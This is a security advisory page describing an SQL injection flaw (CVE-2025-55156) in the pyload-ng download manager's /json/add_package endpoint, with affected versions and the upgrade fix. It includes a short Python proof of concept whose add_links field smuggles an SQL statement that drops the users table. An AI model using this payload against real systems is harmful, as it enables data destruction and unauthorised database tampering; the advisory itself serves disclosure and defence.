SQL Injection Affecting pyload-ng package, versions [,0.5.0b3.dev91)


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.04% (10th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about SQL Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-PYLOADNG-11951457
  • published17 Aug 2025
  • disclosed11 Aug 2025
  • creditcyjhhh

Introduced: 11 Aug 2025

NewCVE-2025-55156  (opens in a new tab)
CWE-89  (opens in a new tab)

How to fix?

Upgrade pyload-ng to version 0.5.0b3.dev91 or higher.

Overview

pyload-ng is a The free and open-source Download Manager written in pure Python

Affected versions of this package are vulnerable to SQL Injection via the add_links parameter in the /json/add_package API endpoint. An attacker can modify or delete data in the database by injecting malicious SQL statements.

PoC

import requests


if __name__ == "__main__":
    url = "http://localhost:8000/json/add_package"
    data = {
        "add_name": "My Downloads1",
        "add_dest": "0",
        "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--",
        "add_password": "mypassword"
    }

    response = requests.post(url, cookies=your_cookies, data=data)
    print(response.status_code, response.text)

CVSS Base Scores

version 4.0
version 3.1